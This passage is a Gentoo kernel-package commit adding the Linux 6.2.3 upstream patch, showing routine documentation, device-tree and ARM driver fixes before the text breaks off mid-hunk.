Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |     4 +
 1002_linux-6.2.3.patch | 37425 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 37429 insertions(+)

diff --git a/0000_README b/0000_README
index 49d3a418..57b81d70 100644
--- a/0000_README
+++ b/0000_README
@@ -51,6 +51,10 @@ Patch:  1001_linux-6.2.2.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.2
 
+Patch:  1002_linux-6.2.3.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.3
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1002_linux-6.2.3.patch b/1002_linux-6.2.3.patch
new file mode 100644
index 00000000..435fd26a
--- /dev/null
+++ b/1002_linux-6.2.3.patch
@@ -0,0 +1,37425 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 60370f2c67b99..258e45cc3b2db 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -86,6 +86,8 @@ Brief summary of control files.
+  memory.swappiness		     set/show swappiness parameter of vmscan
+ 				     (See sysctl's vm.swappiness)
+  memory.move_charge_at_immigrate     set/show controls of moving charges
++                                     This knob is deprecated and shouldn't be
++                                     used.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+@@ -717,8 +719,15 @@ NOTE2:
+        It is recommended to set the soft limit always below the hard limit,
+        otherwise the hard limit will take precedence.
+ 
+-8. Move charges at task migration
+-=================================
++8. Move charges at task migration (DEPRECATED!)
++===============================================
++
++THIS IS DEPRECATED!
++
++It's expensive and unreliable! It's better practice to launch workload
++tasks directly from inside their target cgroup. Use dedicated workload
++cgroups to allow fine-grained policy adjustments without having to
++move physical pages between control domains.
+ 
+ Users can move charges associated with a task along with task migration, that
+ is, uncharge task's pages from the old cgroup and charge them to the new cgroup.
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index c4dcdb3d0d451..a39bbfe9526b6 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -479,8 +479,16 @@ Spectre variant 2
+    On Intel Skylake-era systems the mitigation covers most, but not all,
+    cases. See :ref:`[3] <spec_ref3>` for more details.
+ 
+-   On CPUs with hardware mitigation for Spectre variant 2 (e.g. Enhanced
+-   IBRS on x86), retpoline is automatically disabled at run time.
++   On CPUs with hardware mitigation for Spectre variant 2 (e.g. IBRS
++   or enhanced IBRS on x86), retpoline is automatically disabled at run time.
++
++   Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
++   boot, by setting the IBRS bit, and they're automatically protected against
++   Spectre v2 variant attacks, including cross-thread branch target injections
++   on SMT systems (STIBP). In other words, eIBRS enables STIBP too.
++
++   Legacy IBRS systems clear the IBRS bit on exit to userspace and
++   therefore explicitly enable STIBP for that
+ 
+    The retpoline mitigation is turned on by default on vulnerable
+    CPUs. It can be forced on or off by the administrator
+@@ -504,9 +512,12 @@ Spectre variant 2
+    For Spectre variant 2 mitigation, individual user programs
+    can be compiled with return trampolines for indirect branches.
+    This protects them from consuming poisoned entries in the branch
+-   target buffer left by malicious software.  Alternatively, the
+-   programs can disable their indirect branch speculation via prctl()
+-   (See :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
++   target buffer left by malicious software.
++
++   On legacy IBRS systems, at return to userspace, implicit STIBP is disabled
++   because the kernel clears the IBRS bit. In this case, the userspace programs
++   can disable indirect branch speculation via prctl() (See
++   :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
+    On x86, this will turn on STIBP to guard against attacks from the
+    sibling thread when the user program is running, and use IBPB to
+    flush the branch target buffer when switching to/from the program.
+diff --git a/Documentation/admin-guide/kdump/gdbmacros.txt b/Documentation/admin-guide/kdump/gdbmacros.txt
+index 82aecdcae8a6c..030de95e3e6b2 100644
+--- a/Documentation/admin-guide/kdump/gdbmacros.txt
++++ b/Documentation/admin-guide/kdump/gdbmacros.txt
+@@ -312,10 +312,10 @@ define dmesg
+ 			set var $prev_flags = $info->flags
+ 		end
+ 
+-		set var $id = ($id + 1) & $id_mask
+ 		if ($id == $end_id)
+ 			loop_break
+ 		end
++		set var $id = ($id + 1) & $id_mask
+ 	end
+ end
+ document dmesg
+diff --git a/Documentation/bpf/instruction-set.rst b/Documentation/bpf/instruction-set.rst
+index e672d5ec6cc7b..2d3fe59bd260f 100644
+--- a/Documentation/bpf/instruction-set.rst
++++ b/Documentation/bpf/instruction-set.rst
+@@ -99,19 +99,26 @@ code      value  description
+ BPF_ADD   0x00   dst += src
+ BPF_SUB   0x10   dst -= src
+ BPF_MUL   0x20   dst \*= src
+-BPF_DIV   0x30   dst /= src
++BPF_DIV   0x30   dst = (src != 0) ? (dst / src) : 0
+ BPF_OR    0x40   dst \|= src
+ BPF_AND   0x50   dst &= src
+ BPF_LSH   0x60   dst <<= src
+ BPF_RSH   0x70   dst >>= src
+ BPF_NEG   0x80   dst = ~src
+-BPF_MOD   0x90   dst %= src
++BPF_MOD   0x90   dst = (src != 0) ? (dst % src) : dst
+ BPF_XOR   0xa0   dst ^= src
+ BPF_MOV   0xb0   dst = src
+ BPF_ARSH  0xc0   sign extending shift right
+ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ ========  =====  ==========================================================
+ 
++Underflow and overflow are allowed during arithmetic operations, meaning
++the 64-bit or 32-bit value will wrap. If eBPF program execution would
++result in division by zero, the destination register is instead set to zero.
++If execution would result in modulo by zero, for ``BPF_ALU64`` the value of
++the destination register is unchanged whereas for ``BPF_ALU`` the upper
++32 bits of the destination register are zeroed.
++
+ ``BPF_ADD | BPF_X | BPF_ALU`` means::
+ 
+   dst_reg = (u32) dst_reg + (u32) src_reg;
+@@ -128,6 +135,11 @@ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ 
+   dst_reg = dst_reg ^ imm32
+ 
++Also note that the division and modulo operations are unsigned. Thus, for
++``BPF_ALU``, 'imm' is first interpreted as an unsigned 32-bit value, whereas
++for ``BPF_ALU64``, 'imm' is first sign extended to 64 bits and the result
++interpreted as an unsigned 64-bit value. There are no instructions for
++signed division or modulo.
+ 
+ Byte swap instructions
+ ~~~~~~~~~~~~~~~~~~~~~~
+diff --git a/Documentation/dev-tools/gdb-kernel-debugging.rst b/Documentation/dev-tools/gdb-kernel-debugging.rst
+index 8e0f1fe8d17ad..895285c037c72 100644
+--- a/Documentation/dev-tools/gdb-kernel-debugging.rst
++++ b/Documentation/dev-tools/gdb-kernel-debugging.rst
+@@ -39,6 +39,10 @@ Setup
+   this mode. In this case, you should build the kernel with
+   CONFIG_RANDOMIZE_BASE disabled if the architecture supports KASLR.
+ 
++- Build the gdb scripts (required on kernels v5.1 and above)::
++
++    make scripts_gdb
++
+ - Enable the gdb stub of QEMU/KVM, either
+ 
+     - at VM startup time by appending "-s" to the QEMU command line
+diff --git a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+index 63fb02014a56a..117e3db43f84a 100644
+--- a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
++++ b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+@@ -32,7 +32,7 @@ properties:
+       - items:
+           - enum:
+               - mediatek,mt8186-disp-ccorr
+-          - const: mediatek,mt8183-disp-ccorr
++          - const: mediatek,mt8192-disp-ccorr
+ 
+   reg:
+     maxItems: 1
+diff --git a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+index 5b8d59245f82f..b358fd601ed38 100644
+--- a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
++++ b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+@@ -62,7 +62,7 @@ patternProperties:
+         description: phandle of the CPU DAI
+ 
+     patternProperties:
+-      "^codec-[0-9]+$":
++      "^codec(-[0-9]+)?$":
+         type: object
+         additionalProperties: false
+         description: |-
+diff --git a/Documentation/hwmon/ftsteutates.rst b/Documentation/hwmon/ftsteutates.rst
+index 58a2483d8d0da..198fa8e2819da 100644
+--- a/Documentation/hwmon/ftsteutates.rst
++++ b/Documentation/hwmon/ftsteutates.rst
+@@ -22,6 +22,10 @@ enhancements. It can monitor up to 4 voltages, 16 temperatures and
+ 8 fans. It also contains an integrated watchdog which is currently
+ implemented in this driver.
+ 
++The 4 voltages require a board-specific multiplier, since the BMC can
++only measure voltages up to 3.3V and thus relies on voltage dividers.
++Consult your motherboard manual for details.
++
+ To clear a temperature or fan alarm, execute the following command with the
+ correct path to the alarm file::
+ 
+diff --git a/Documentation/virt/kvm/api.rst b/Documentation/virt/kvm/api.rst
+index 0a67cb738013e..dc89d4e9d23e6 100644
+--- a/Documentation/virt/kvm/api.rst
++++ b/Documentation/virt/kvm/api.rst
+@@ -4457,6 +4457,18 @@ not holding a previously reported uncorrected error).
+ :Parameters: struct kvm_s390_cmma_log (in, out)
+ :Returns: 0 on success, a negative value on error
+ 
++Errors:
++
++  ======     =============================================================
++  ENOMEM     not enough memory can be allocated to complete the task
++  ENXIO      if CMMA is not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but migration mode was not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but dirty tracking has been
++             disabled (and thus migration mode was automatically disabled)
++  EFAULT     if the userspace address is invalid or if no page table is
++             present for the addresses (e.g. when using hugepages).
++  ======     =============================================================
++
+ This ioctl is used to get the values of the CMMA bits on the s390
+ architecture. It is meant to be used in two scenarios:
+ 
+@@ -4537,12 +4549,6 @@ mask is unused.
+ 
+ values points to the userspace buffer where the result will be stored.
+ 
+-This ioctl can fail with -ENOMEM if not enough memory can be allocated to
+-complete the task, with -ENXIO if CMMA is not enabled, with -EINVAL if
+-KVM_S390_CMMA_PEEK is not set but migration mode was not enabled, with
+--EFAULT if the userspace address is invalid or if no page table is
+-present for the addresses (e.g. when using hugepages).
+-
+ 4.108 KVM_S390_SET_CMMA_BITS
+ ----------------------------
+ 
+diff --git a/Documentation/virt/kvm/devices/vm.rst b/Documentation/virt/kvm/devices/vm.rst
+index 60acc39e0e937..147efec626e52 100644
+--- a/Documentation/virt/kvm/devices/vm.rst
++++ b/Documentation/virt/kvm/devices/vm.rst
+@@ -302,6 +302,10 @@ Allows userspace to start migration mode, needed for PGSTE migration.
+ Setting this attribute when migration mode is already active will have
+ no effects.
+ 
++Dirty tracking must be enabled on all memslots, else -EINVAL is returned. When
++dirty tracking is disabled on any memslot, migration mode is automatically
++stopped.
++
+ :Parameters: none
+ :Returns:   -ENOMEM if there is not enough free memory to start migration mode;
+ 	    -EINVAL if the state of the VM is invalid (e.g. no memory defined);
+diff --git a/Makefile b/Makefile
+index 1836ddaf2c94c..eef164b4172a9 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 2
++SUBLEVEL = 3
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/alpha/boot/tools/objstrip.c b/arch/alpha/boot/tools/objstrip.c
+index 08b430d25a315..7cf92d172dce9 100644
+--- a/arch/alpha/boot/tools/objstrip.c
++++ b/arch/alpha/boot/tools/objstrip.c
+@@ -148,7 +148,7 @@ main (int argc, char *argv[])
+ #ifdef __ELF__
+     elf = (struct elfhdr *) buf;
+ 
+-    if (elf->e_ident[0] == 0x7f && str_has_prefix((char *)elf->e_ident + 1, "ELF")) {
++    if (memcmp(&elf->e_ident[EI_MAG0], ELFMAG, SELFMAG) == 0) {
+ 	if (elf->e_type != ET_EXEC) {
+ 	    fprintf(stderr, "%s: %s is not an ELF executable\n",
+ 		    prog_name, inname);
+diff --git a/arch/alpha/kernel/traps.c b/arch/alpha/kernel/traps.c
+index 8a66fe544c69b..d9a67b370e047 100644
+--- a/arch/alpha/kernel/traps.c
++++ b/arch/alpha/kernel/traps.c
+@@ -233,7 +233,21 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ {
+ 	int signo, code;
+ 
+-	if ((regs->ps & ~IPL_MAX) == 0) {
++	if (type == 3) { /* FEN fault */
++		/* Irritating users can call PAL_clrfen to disable the
++		   FPU for the process.  The kernel will then trap in
++		   do_switch_stack and undo_switch_stack when we try
++		   to save and restore the FP registers.
++
++		   Given that GCC by default generates code that uses the
++		   FP registers, PAL_clrfen is not useful except for DoS
++		   attacks.  So turn the bleeding FPU back on and be done
++		   with it.  */
++		current_thread_info()->pcb.flags |= 1;
++		__reload_thread(&current_thread_info()->pcb);
++		return;
++	}
++	if (!user_mode(regs)) {
+ 		if (type == 1) {
+ 			const unsigned int *data
+ 			  = (const unsigned int *) regs->pc;
+@@ -366,20 +380,6 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ 		}
+ 		break;
+ 
+-	      case 3: /* FEN fault */
+-		/* Irritating users can call PAL_clrfen to disable the
+-		   FPU for the process.  The kernel will then trap in
+-		   do_switch_stack and undo_switch_stack when we try
+-		   to save and restore the FP registers.
+-
+-		   Given that GCC by default generates code that uses the
+-		   FP registers, PAL_clrfen is not useful except for DoS
+-		   attacks.  So turn the bleeding FPU back on and be done
+-		   with it.  */
+-		current_thread_info()->pcb.flags |= 1;
+-		__reload_thread(&current_thread_info()->pcb);
+-		return;
+-
+ 	      case 5: /* illoc */
+ 	      default: /* unexpected instruction-fault type */
+ 		      ;
+diff --git a/arch/arm/boot/dts/exynos3250-rinato.dts b/arch/arm/boot/dts/exynos3250-rinato.dts
+index 6d2c7bb191842..2eb682009815a 100644
+--- a/arch/arm/boot/dts/exynos3250-rinato.dts
++++ b/arch/arm/boot/dts/exynos3250-rinato.dts
+@@ -250,7 +250,7 @@
+ 	i80-if-timings {
+ 		cs-setup = <0>;
+ 		wr-setup = <0>;
+-		wr-act = <1>;
++		wr-active = <1>;
+ 		wr-hold = <0>;
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+index 021d9fc1b4923..27a1a89526655 100644
+--- a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+@@ -10,7 +10,7 @@
+ / {
+ thermal-zones {
+ 	cpu_thermal: cpu-thermal {
+-		thermal-sensors = <&tmu 0>;
++		thermal-sensors = <&tmu>;
+ 		polling-delay-passive = <0>;
+ 		polling-delay = <0>;
+ 		trips {
+diff --git a/arch/arm/boot/dts/exynos4.dtsi b/arch/arm/boot/dts/exynos4.dtsi
+index 5c4ecda27a476..7ba7a18c25000 100644
+--- a/arch/arm/boot/dts/exynos4.dtsi
++++ b/arch/arm/boot/dts/exynos4.dtsi
+@@ -605,7 +605,7 @@
+ 			status = "disabled";
+ 
+ 			hdmi_i2c_phy: hdmiphy@38 {
+-				compatible = "exynos4210-hdmiphy";
++				compatible = "samsung,exynos4210-hdmiphy";
+ 				reg = <0x38>;
+ 			};
+ 		};
+diff --git a/arch/arm/boot/dts/exynos4210.dtsi b/arch/arm/boot/dts/exynos4210.dtsi
+index 2c25cc37934e8..f8c6c5d1906af 100644
+--- a/arch/arm/boot/dts/exynos4210.dtsi
++++ b/arch/arm/boot/dts/exynos4210.dtsi
+@@ -393,7 +393,6 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
+ };
+ 
+ &gic {
+diff --git a/arch/arm/boot/dts/exynos5250.dtsi b/arch/arm/boot/dts/exynos5250.dtsi
+index 4708dcd575a77..01751706ff96d 100644
+--- a/arch/arm/boot/dts/exynos5250.dtsi
++++ b/arch/arm/boot/dts/exynos5250.dtsi
+@@ -1107,7 +1107,7 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
++	thermal-sensors = <&tmu>;
+ 
+ 	cooling-maps {
+ 		map0 {
+diff --git a/arch/arm/boot/dts/exynos5410-odroidxu.dts b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+index d1cbc6b8a5703..e18110b93875a 100644
+--- a/arch/arm/boot/dts/exynos5410-odroidxu.dts
++++ b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+@@ -120,7 +120,6 @@
+ };
+ 
+ &cpu0_thermal {
+-	thermal-sensors = <&tmu_cpu0 0>;
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+ 
+diff --git a/arch/arm/boot/dts/exynos5420.dtsi b/arch/arm/boot/dts/exynos5420.dtsi
+index 9f2523a873d9d..62263eb91b3cc 100644
+--- a/arch/arm/boot/dts/exynos5420.dtsi
++++ b/arch/arm/boot/dts/exynos5420.dtsi
+@@ -592,7 +592,7 @@
+ 		};
+ 
+ 		mipi_phy: mipi-video-phy {
+-			compatible = "samsung,s5pv210-mipi-video-phy";
++			compatible = "samsung,exynos5420-mipi-video-phy";
+ 			syscon = <&pmu_system_controller>;
+ 			#phy-cells = <1>;
+ 		};
+diff --git a/arch/arm/boot/dts/exynos5422-odroidhc1.dts b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+index 3de7019572a20..5e42803937067 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidhc1.dts
++++ b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+@@ -31,7 +31,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			trips {
+ 				cpu0_alert0: cpu-alert-0 {
+ 					temperature = <70000>; /* millicelsius */
+@@ -86,7 +86,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			trips {
+ 				cpu1_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -130,7 +130,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			trips {
+ 				cpu2_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -174,7 +174,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			trips {
+ 				cpu3_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -218,7 +218,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			trips {
+ 				gpu_alert0: gpu-alert-0 {
+ 					temperature = <70000>;
+diff --git a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+index a6961ff240304..e6e7e2ff2a261 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
++++ b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+@@ -50,7 +50,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -139,7 +139,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -212,7 +212,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -285,7 +285,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -358,7 +358,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 0fc9e6b8b05dc..11b9321badc51 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -513,7 +513,7 @@
+ 
+ 				mux: mux-controller {
+ 					compatible = "mmio-mux";
+-					#mux-control-cells = <0>;
++					#mux-control-cells = <1>;
+ 					mux-reg-masks = <0x14 0x00000010>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index f1c0dab409922..93d71aff3fab7 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -578,7 +578,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx55-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx55-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x20000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/qcom-sdx65.dtsi b/arch/arm/boot/dts/qcom-sdx65.dtsi
+index b073e0c63df4f..408c4b87d44b0 100644
+--- a/arch/arm/boot/dts/qcom-sdx65.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx65.dtsi
+@@ -455,7 +455,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx65-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx65-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x40000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/stm32mp131.dtsi b/arch/arm/boot/dts/stm32mp131.dtsi
+index accc3824f7e98..99d88096959eb 100644
+--- a/arch/arm/boot/dts/stm32mp131.dtsi
++++ b/arch/arm/boot/dts/stm32mp131.dtsi
+@@ -527,6 +527,7 @@
+ 
+ 			part_number_otp: part_number_otp@4 {
+ 				reg = <0x4 0x2>;
++				bits = <0 12>;
+ 			};
+ 			ts_cal1: calib@5c {
+ 				reg = <0x5c 0x2>;
+diff --git a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+index 43641cb82398f..343b02b971555 100644
+--- a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
++++ b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+@@ -57,7 +57,7 @@
+ 		regulator-ramp-delay = <50>; /* 4ms */
+ 
+ 		enable-active-high;
+-		enable-gpio = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
++		enable-gpios = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
+ 		gpios = <&r_pio 0 6 GPIO_ACTIVE_HIGH>; /* PL6 */
+ 		gpios-states = <0x1>;
+ 		states = <1100000 0>, <1300000 1>;
+diff --git a/arch/arm/configs/bcm2835_defconfig b/arch/arm/configs/bcm2835_defconfig
+index a51babd178c26..be0c984a66947 100644
+--- a/arch/arm/configs/bcm2835_defconfig
++++ b/arch/arm/configs/bcm2835_defconfig
+@@ -107,6 +107,7 @@ CONFIG_MEDIA_CAMERA_SUPPORT=y
+ CONFIG_DRM=y
+ CONFIG_DRM_V3D=y
+ CONFIG_DRM_VC4=y
++CONFIG_FB=y
+ CONFIG_FB_SIMPLE=y
+ CONFIG_FRAMEBUFFER_CONSOLE=y
+ CONFIG_SOUND=y
+diff --git a/arch/arm/mach-imx/mmdc.c b/arch/arm/mach-imx/mmdc.c
+index af12668d0bf51..b9efe9da06e0b 100644
+--- a/arch/arm/mach-imx/mmdc.c
++++ b/arch/arm/mach-imx/mmdc.c
+@@ -99,6 +99,7 @@ struct mmdc_pmu {
+ 	cpumask_t cpu;
+ 	struct hrtimer hrtimer;
+ 	unsigned int active_events;
++	int id;
+ 	struct device *dev;
+ 	struct perf_event *mmdc_events[MMDC_NUM_COUNTERS];
+ 	struct hlist_node node;
+@@ -433,8 +434,6 @@ static enum hrtimer_restart mmdc_pmu_timer_handler(struct hrtimer *hrtimer)
+ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		void __iomem *mmdc_base, struct device *dev)
+ {
+-	int mmdc_num;
+-
+ 	*pmu_mmdc = (struct mmdc_pmu) {
+ 		.pmu = (struct pmu) {
+ 			.task_ctx_nr    = perf_invalid_context,
+@@ -452,15 +451,16 @@ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		.active_events = 0,
+ 	};
+ 
+-	mmdc_num = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
++	pmu_mmdc->id = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
+ 
+-	return mmdc_num;
++	return pmu_mmdc->id;
+ }
+ 
+ static int imx_mmdc_remove(struct platform_device *pdev)
+ {
+ 	struct mmdc_pmu *pmu_mmdc = platform_get_drvdata(pdev);
+ 
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	perf_pmu_unregister(&pmu_mmdc->pmu);
+ 	iounmap(pmu_mmdc->mmdc_base);
+@@ -474,7 +474,6 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ {
+ 	struct mmdc_pmu *pmu_mmdc;
+ 	char *name;
+-	int mmdc_num;
+ 	int ret;
+ 	const struct of_device_id *of_id =
+ 		of_match_device(imx_mmdc_dt_ids, &pdev->dev);
+@@ -497,14 +496,14 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 		cpuhp_mmdc_state = ret;
+ 	}
+ 
+-	mmdc_num = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
+-	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+-	if (mmdc_num == 0)
+-		name = "mmdc";
+-	else
+-		name = devm_kasprintf(&pdev->dev,
+-				GFP_KERNEL, "mmdc%d", mmdc_num);
++	ret = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
++	if (ret < 0)
++		goto pmu_free;
+ 
++	name = devm_kasprintf(&pdev->dev,
++				GFP_KERNEL, "mmdc%d", ret);
++
++	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+ 	pmu_mmdc->devtype_data = (struct fsl_mmdc_devtype_data *)of_id->data;
+ 
+ 	hrtimer_init(&pmu_mmdc->hrtimer, CLOCK_MONOTONIC,
+@@ -525,6 +524,7 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ pmu_register_err:
+ 	pr_warn("MMDC Perf PMU failed (%d), disabled\n", ret);
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	hrtimer_cancel(&pmu_mmdc->hrtimer);
+ pmu_free:
+diff --git a/arch/arm/mach-omap1/timer.c b/arch/arm/mach-omap1/timer.c
+index f5cd4bbf7566d..81a912c1145a9 100644
+--- a/arch/arm/mach-omap1/timer.c
++++ b/arch/arm/mach-omap1/timer.c
+@@ -158,7 +158,7 @@ err_free_pdata:
+ 	kfree(pdata);
+ 
+ err_free_pdev:
+-	platform_device_unregister(pdev);
++	platform_device_put(pdev);
+ 
+ 	return ret;
+ }
+diff --git a/arch/arm/mach-omap2/omap4-common.c b/arch/arm/mach-omap2/omap4-common.c
+index 6d1eb4eefefe5..d9ed2a5dcd5ef 100644
+--- a/arch/arm/mach-omap2/omap4-common.c
++++ b/arch/arm/mach-omap2/omap4-common.c
+@@ -140,6 +140,7 @@ static int __init omap4_sram_init(void)
+ 			__func__);
+ 	else
+ 		sram_sync = (void __iomem *)gen_pool_alloc(sram_pool, PAGE_SIZE);
++	of_node_put(np);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm/mach-omap2/timer.c b/arch/arm/mach-omap2/timer.c
+index 620ba69c8f114..5677c4a08f376 100644
+--- a/arch/arm/mach-omap2/timer.c
++++ b/arch/arm/mach-omap2/timer.c
+@@ -76,6 +76,7 @@ static void __init realtime_counter_init(void)
+ 	}
+ 
+ 	rate = clk_get_rate(sys_clk);
++	clk_put(sys_clk);
+ 
+ 	if (soc_is_dra7xx()) {
+ 		/*
